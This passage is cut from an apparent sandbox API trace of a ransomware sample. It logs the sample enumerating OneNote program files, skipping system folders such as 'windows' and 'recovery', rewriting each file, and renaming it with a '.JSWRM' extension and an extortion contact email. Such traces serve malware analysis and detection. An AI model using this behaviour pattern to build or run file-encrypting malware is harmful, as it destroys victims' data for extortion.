lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.639] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote.gpd" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote.gpd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.640] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9568) returned 1 [0137.640] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.640] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x2560, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x2560, lpOverlapped=0x0) returned 1 [0137.643] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.643] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x2560, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x2560, lpOverlapped=0x0) returned 1 [0137.643] CloseHandle (hObject=0x238) returned 1 [0137.643] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote.gpd" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote.gpd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote.gpd.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote.gpd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.644] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c8ab024, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c8ab024, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c8ab024, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x57, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="SendToOneNote.ini", cAlternateFileName="SENDTO~2.INI")) returned 1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2=".") returned 1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="..") returned 1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="...") returned 1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="windows") returned -1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="recovery") returned 1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="perflogs") returned 1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="documents and settings") returned 1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="$RECYCLE.BIN") returned 1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="system volume information") returned -1 [0137.644] lstrcmpiW (lpString1="SendToOneNote.ini", lpString2="msocache") returned 1 [0137.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote.ini", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote.ini", cchWideChar=17, lpMultiByteStr=0x2411f0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNote.ini", lpUsedDefaultChar=0x0) returned 17 [0137.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote.ini", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNote.ini", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNote.ini", lpUsedDefaultChar=0x0) returned 17 [0137.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.645] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.645] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote.ini" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.645] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=87) returned 1 [0137.646] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.646] ReadFile (in: hFile=0x238, lpBuffer=0x22bf60, nNumberOfBytesToRead=0x50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x22bf60*, lpNumberOfBytesRead=0x345e89c*=0x50, lpOverlapped=0x0) returned 1 [0137.646] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.647] WriteFile (in: hFile=0x238, lpBuffer=0x22bf60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x22bf60*, lpNumberOfBytesWritten=0x345e898*=0x50, lpOverlapped=0x0) returned 1 [0137.647] CloseHandle (hObject=0x238) returned 1 [0137.647] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote.ini" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote.ini"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNote.ini.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenote.ini.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.648] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x17c93f4, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x17c93f4, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x17c93f4, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x180d0, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="SendToOneNoteFilter.dll", cAlternateFileName="SENDTO~1.DLL")) returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2=".") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="..") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="...") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="windows") returned -1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="recovery") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="perflogs") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="documents and settings") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="$RECYCLE.BIN") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="system volume information") returned -1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteFilter.dll", lpString2="msocache") returned 1 [0137.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNoteFilter.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0137.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNoteFilter.dll", cchWideChar=23, lpMultiByteStr=0x2412b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNoteFilter.dll", lpUsedDefaultChar=0x0) returned 23 [0137.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNoteFilter.dll", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0137.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNoteFilter.dll", cchWideChar=23, lpMultiByteStr=0x241308, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNoteFilter.dll", lpUsedDefaultChar=0x0) returned 23 [0137.648] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c8ab024, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c8ab024, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c8ab024, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x121, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="SendToOneNoteNames.gpd", cAlternateFileName="SENDTO~2.GPD")) returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2=".") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="..") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="...") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="windows") returned -1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="recovery") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="perflogs") returned 1 [0137.648] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="documents and settings") returned 1 [0137.649] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="$RECYCLE.BIN") returned 1 [0137.649] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="system volume information") returned -1 [0137.649] lstrcmpiW (lpString1="SendToOneNoteNames.gpd", lpString2="msocache") returned 1 [0137.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNoteNames.gpd", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0137.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNoteNames.gpd", cchWideChar=22, lpMultiByteStr=0x2412b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNoteNames.gpd", lpUsedDefaultChar=0x0) returned 22 [0137.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNoteNames.gpd", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0137.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendToOneNoteNames.gpd", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendToOneNoteNames.gpd", lpUsedDefaultChar=0x0) returned 22 [0137.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.649] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNoteNames.gpd" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenotenames.gpd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0137.650] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=289) returned 1 [0137.650] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.650] ReadFile (in: hFile=0x238, lpBuffer=0x23ef08, nNumberOfBytesToRead=0x120, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23ef08*, lpNumberOfBytesRead=0x345e89c*=0x120, lpOverlapped=0x0) returned 1 [0137.658] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.658] WriteFile (in: hFile=0x238, lpBuffer=0x23ef08*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23ef08*, lpNumberOfBytesWritten=0x345e898*=0x120, lpOverlapped=0x0) returned 1 [0137.658] CloseHandle (hObject=0x238) returned 1 [0137.658] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNoteNames.gpd" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenotenames.gpd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\OneNote\\SendToOneNoteNames.gpd.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote\\sendtoonenotenames.gpd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.659] FindNextFileW (in: hFindFile=0x231f80, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1c8ab024, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1c8ab024, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1c8ab024, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x121, dwReserved0=0xf1418, dwReserved1=0x0, cFileName="SendToOneNoteNames.gpd", cAlternateFileName="SENDTO~2.GPD")) returned 0 [0137.659] FindClose (in: hFindFile=0x231f80 | out: hFindFile=0x231f80) returned 1 [0137.659] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4ae41a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xdb652e29, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xdcec30aa, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x205e48, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONENOTE.EXE", cAlternateFileName="")) returned 1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2=".") returned 1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="..") returned 1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="...") returned 1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="windows") returned -1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="recovery") returned -1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="perflogs") returned -1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="documents and settings") returned 1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="system volume information") returned -1 [0137.659] lstrcmpiW (lpString1="ONENOTE.EXE", lpString2="msocache") returned 1 [0137.659] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.EXE", cchWideChar=11, lpMultiByteStr=0x345ef40, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.EXE", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.EXE", cchWideChar=11, lpMultiByteStr=0x345ef10, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE.EXE", lpUsedDefaultChar=0x0) returned 11 [0137.660] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1c884dc0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONENOTE.VisualElementsManifest.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2=".") returned 1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="..") returned 1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="...") returned 1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="windows") returned -1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="recovery") returned -1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="perflogs") returned -1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="documents and settings") returned 1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="$RECYCLE.BIN") returned 1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="system volume information") returned -1 [0137.660] lstrcmpiW (lpString1="ONENOTE.VisualElementsManifest.xml", lpString2="msocache") returned 1 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.VisualElementsManifest.xml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.VisualElementsManifest.xml", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 34 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.VisualElementsManifest.xml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTE.VisualElementsManifest.xml", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTE.VisualElementsManifest.xml", lpUsedDefaultChar=0x0) returned 34 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0137.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0137.660] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote.visualelementsmanifest.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0137.661] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=342) returned 1 [0137.661] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.661] ReadFile (in: hFile=0x45c, lpBuffer=0x21c578, nNumberOfBytesToRead=0x150, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesRead=0x345ec04*=0x150, lpOverlapped=0x0) returned 1 [0137.662] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0137.662] WriteFile (in: hFile=0x45c, lpBuffer=0x21c578*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x21c578*, lpNumberOfBytesWritten=0x345ec00*=0x150, lpOverlapped=0x0) returned 1 [0137.662] CloseHandle (hObject=0x45c) returned 1 [0137.662] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.VisualElementsManifest.xml" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote.visualelementsmanifest.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.VisualElementsManifest.xml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\onenote.visualelementsmanifest.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0137.663] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcb4fa8f4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcb4fa8f4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcb4fa8f4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2a0b0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONENOTEM.EXE", cAlternateFileName="")) returned 1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2=".") returned 1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="..") returned 1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="...") returned 1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="windows") returned -1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="recovery") returned -1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="perflogs") returned -1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="documents and settings") returned 1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="$RECYCLE.BIN") returned 1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="system volume information") returned -1 [0137.663] lstrcmpiW (lpString1="ONENOTEM.EXE", lpString2="msocache") returned 1 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTEM.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTEM.EXE", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTEM.EXE", lpUsedDefaultChar=0x0) returned 12 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTEM.EXE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.664] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ONENOTEM.EXE", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ONENOTEM.EXE", lpUsedDefaultChar=0x0) returned 12 [0137.664] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xeddf70e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xeddf70e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x6165f55, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x313650, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ONFILTER.DLL", cAlternateFileName="")) returned 1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2=".") returned 1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="..") returned 1 [0137.664] lstrcmpiW (lpString1="ONFILTER.DLL", lpString2="...") 